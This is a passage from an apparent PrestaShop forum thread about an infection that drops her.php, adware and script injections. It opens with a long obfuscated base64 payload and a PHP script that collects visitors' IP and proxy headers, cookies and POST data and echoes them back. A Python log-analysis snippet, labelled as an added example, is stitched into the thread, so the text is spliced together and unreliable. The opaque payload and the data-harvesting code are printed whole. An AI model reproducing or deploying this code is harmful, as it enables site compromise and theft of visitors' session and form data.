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
'\x29\x29\x29\x3B",".");}?>

<?php
error_reporting(0);

$empty = "";

function filt($data)
{
if (is_array($data)){
	$datanew = "";
	foreach ($data as $key=>$val)
	{
		$datanew .= htmlspecialchars(stripslashes($key)."=".stripslashes($val))."&";
	}
}
else {
	$datanew = $data;
	$datanew = htmlspecialchars(stripslashes($datanew));
}
return $datanew;
}

   if(isset($_SERVER['HTTP_FORWARDED_FOR'])) $DATA_HTTP_FORWARDED_FOR=filt($_SERVER['HTTP_FORWARDED_FOR']); else $DATA_HTTP_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $DATA_HTTP_X_FORWARDED_FOR=filt($_SERVER['HTTP_X_FORWARDED_FOR']); else $DATA_HTTP_X_FORWARDED_FOR=$empty;
   if(isset($_SERVER['HTTP_FROM'])) $DATA_HTTP_FROM=filt($_SERVER['HTTP_FROM']); else $DATA_HTTP_FROM=$empty;
   if(isset($_SERVER['HTTP_CLIENT_IP'])) $DATA_HTTP_CLIENT_IP=filt($_SERVER['HTTP_CLIENT_IP']); else $DATA_HTTP_CLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_HTTP_VIA'])) $DATA_HTTP_HTTP_VIA=filt($_SERVER['HTTP_HTTP_VIA']); else $DATA_HTTP_HTTP_VIA=$empty;
   if(isset($_SERVER['HTTP_XROXY_CONNECTION'])) $DATA_HTTP_XROXY_CONNECTION=filt($_SERVER['HTTP_XROXY_CONNECTION']); else $DATA_HTTP_XROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_CONNECTION'])) $DATA_HTTP_PROXY_CONNECTION=filt($_SERVER['HTTP_PROXY_CONNECTION']); else $DATA_HTTP_PROXY_CONNECTION=$empty;
   if(isset($_SERVER['HTTP_PROXY_USER'])) $DATA_HTTP_PROXY_USER=filt($_SERVER['HTTP_PROXY_USER']); else $DATA_HTTP_PROXY_USER=$empty;
   if(isset($_SERVER['HTTP_PC_REMOTE_ADDR'])) $DATA_HTTP_PC_REMOTE_ADDR=filt($_SERVER['HTTP_PC_REMOTE_ADDR']); else $DATA_HTTP_PC_REMOTE_ADDR=$empty;
   if(isset($_SERVER['HTTP_X_REMOTECLIENT_IP'])) $DATA_HTTP_X_REMOTECLIENT_IP=filt($_SERVER['HTTP_X_REMOTECLIENT_IP']); else $DATA_HTTP_X_REMOTECLIENT_IP=$empty;
   if(isset($_SERVER['HTTP_PROXY_PORT'])) $DATA_HTTP_PROXY_PORT=filt($_SERVER['HTTP_PROXY_PORT']); else $DATA_HTTP_PROXY_PORT=$empty;
   if(isset($_SERVER['HTTP_USER_AGENT'])) $DATA_HTTP_USER_AGENT=filt($_SERVER['HTTP_USER_AGENT']); else $DATA_HTTP_USER_AGENT=$empty;
   if(isset($_SERVER['HTTP_REFERER'])) $DATA_HTTP_REFERER=filt($_SERVER['HTTP_REFERER']); else $DATA_HTTP_REFERER=$empty;
   if(isset($_SERVER['HTTP_ACCEPT'])) $DATA_HTTP_ACCEPT=filt($_SERVER['HTTP_ACCEPT']); else $DATA_HTTP_ACCEPT=$empty;
   if(isset($_SERVER['HTTP_CONNECTION'])) $DATA_HTTP_CONNECTION=filt($_SERVER['HTTP_CONNECTION']); else $DATA_HTTP_CONNECTION=$empty;
   if(isset($_SERVER['GATEWAY_INTERFACE'])) $DATA_GATEWAY_INTERFACE=filt($_SERVER['GATEWAY_INTERFACE']); else $DATA_GATEWAY_INTERFACE=$empty;
   if(isset($_SERVER['REQUEST_METHOD'])) $DATA_REQUEST_METHOD=filt($_SERVER['REQUEST_METHOD']); else $DATA_REQUEST_METHOD=$empty;
   if(isset($_COOKIE)) $_COOKIE=filt($_COOKIE); else $_COOKIE=$empty;
   if(isset($_POST)) $_POST=filt($_POST); else $_POST=$empty;

$data = "<pre>REQUEST_INFO_PAGE_4896485_CODE
REMOTE_ADDR=".filt($_SERVER['REMOTE_ADDR'])."
HTTP_CLIENT_IP=".$DATA_HTTP_CLIENT_IP."
HTTP_X_FORWARDED_FOR=".$DATA_HTTP_X_FORWARDED_FOR."
HTTP_X_FORWARDED=".$DATA_HTTP_FORWARDED_FOR."
HTTP_X_COMING_FROM=
HTTP_FORWARDED_FOR=".$DATA_HTTP_FORWARDED_FOR."
HTTP_FORWARDED=
HTTP_COMING_FROM=
HTTP_VIA=".$DATA_HTTP_HTTP_VIA."
HTTP_XROXY_CONNECTION=".$DATA_HTTP_XROXY_CONNECTION."
HTTP_PROXY_CONNECTION=".$DATA_HTTP_PROXY_CONNECTION."
HTTP_USER_AGENT=".$DATA_HTTP_USER_AGENT."
HTTP_ACCEPT=".$DATA_HTTP_ACCEPT."
HTTP_CONNECTION=".$DATA_HTTP_CONNECTION."
GATEWAY_INTERFACE=".$DATA_GATEWAY_INTERFACE."
REQUEST_METHOD=".$DATA_REQUEST_METHOD."
HTTP_REFERER=".$DATA_HTTP_REFERER."
POST=".$_POST."
COOKIE=".$_COOKIE."
</pre>
   ";

echo $data;
?>


Hi,

 

Same problem in 1.4.4 on a local install of prestashop.

 

My apache shows that the her.php file appeared just after a series of admin actions. Here are the last:

 

 

127.0.0.1 - - [23/Aug/2011:23:27:54 +0200] "POST [...my_local_admin]/ajax.php HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:58 +0200] "POST [...my_local_admin]/ajax.php?toggleScreencast HTTP/1.1" 200 - "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

127.0.0.1 - - [23/Aug/2011:23:27:55 +0200] "POST /[...my_local_admin]/index.php?tab=AdminModules&token=c76a0756b0d565653ca9aabf3e5a35e HTTP/1.1" 200 301411 "http://localhost/[...my_local_admin]/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

---- and now the her php file------

127.0.0.1 - - [23/Aug/2011:23:27:59 +0200] "GET /[...my_local_module_folder]/her.php HTTP/1.1" 200 - "http://localhost/_____Gedone/_Cap_Expresso/html/www2.capexpresso.com/admincap/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:6.0) Gecko/20100101 Firefox/6.0"

 

But I can't find her.php in my modules folder...

 

And now my IE (that I rarely open) opens itself on http://ads.eorezo.com/cgi-bin/advert/getads?x_......

 

My two other sites (1.3.6 not upgraded to 1.4) on online servers don't seem to be affected by this problem...

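The pattern reported in the posts above (a POST to the back office AdminModules tab followed seconds later by a GET for her.php) can be searched for in an Apache access log. This is an added example, not part of any post in the thread; the sample lines are constructed, and the function names, the 30-second window and the placeholder admin path are assumptions.

```python
import re
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample in Apache combined format, modelled on the excerpts in this
# thread (documentation IPs, placeholder admin directory, deliberately unsorted).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Aug/2011:23:27:54 +0200] "POST /admin123/ajax.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
192.0.2.10 - - [23/Aug/2011:23:27:59 +0200] "GET /modules/her.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
192.0.2.10 - - [23/Aug/2011:23:27:55 +0200] "POST /admin123/index.php?tab=AdminModules&token=PLACEHOLDER HTTP/1.1" 200 301411 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Aug/2011:23:40:02 +0200] "GET /modules/her.php HTTP/1.1" 404 211 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Aug/2011:23:41:10 +0200] "GET /sv/hem HTTP/1.1" 200 25448 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield (timestamp, ip, method, url, status) for each parsable line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield ts, m["ip"], m["method"], m["url"], int(m["status"])


def find_her_php_hits(lines, window=timedelta(seconds=30)):
    """Report each request for her.php with the AdminModules POST that preceded it.

    Returns a list of dicts; 'trigger' is None when no AdminModules POST from
    the same client was logged within `window` before the hit.
    """
    events = sorted(parse(lines))  # access logs are not strictly time-ordered
    hits = []
    for i, (ts, ip, method, url, status) in enumerate(events):
        path = url.split("?", 1)[0]
        if not path.endswith("/her.php"):
            continue
        trigger = None
        # Walk backwards in time until we leave the correlation window.
        for pts, pip, pmethod, purl, _ in reversed(events[:i]):
            if ts - pts > window:
                break
            if pip == ip and pmethod == "POST" and "tab=AdminModules" in purl:
                trigger = purl
                break
        hits.append({"time": ts.isoformat(), "ip": ip, "status": status,
                     "served": status == 200, "trigger": trigger})
    return hits


if __name__ == "__main__":
    for hit in find_her_php_hits(SAMPLE_LOG.splitlines()):
        print(hit)
```

Because her.php is reported to delete itself, a served (status 200) hit in the log may be the only remaining trace of it on a given host.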

same problem:

- e66943f1495e1631affdbddae8398209.php file in the download and upload folder

- script in the footer.tpl

 

